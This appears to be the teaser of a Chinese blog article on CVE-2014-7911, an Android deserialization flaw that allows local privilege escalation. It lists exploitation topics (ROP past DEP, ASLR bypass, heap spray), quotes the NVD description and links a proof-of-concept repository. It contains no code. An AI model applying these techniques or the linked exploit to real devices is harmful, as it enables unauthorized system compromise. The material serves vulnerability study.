本文内容:
- 因Android反序列化漏洞导致的Android本地提权
- Android平台上的ROP:绕过DEP
- 绕过Android平台的ASLR
- Android Binder
- Java序列化与反序列化
- Heap Spary
CVE-2014-7911
摘自NVD
luni/src/main/java/java/io/ObjectInputStream.java in the java.io.ObjectInputStream implementation in Android before 5.0.0 does not verify that deserialization will result in an object that met the requirements for serialization, which allows attackers to execute arbitrary code via a crafted finalize method for a serialized object in an ArrayMap Parcel within an intent sent to system_service, as demonstrated by the finalize method of android.os.BinderProxy, aka Bug 15874291.
Source: MITRE
Description Last Modified: 12/15/2014
POC: https://github.com/CytQ/CVE-2014-7911_poc
Continue reading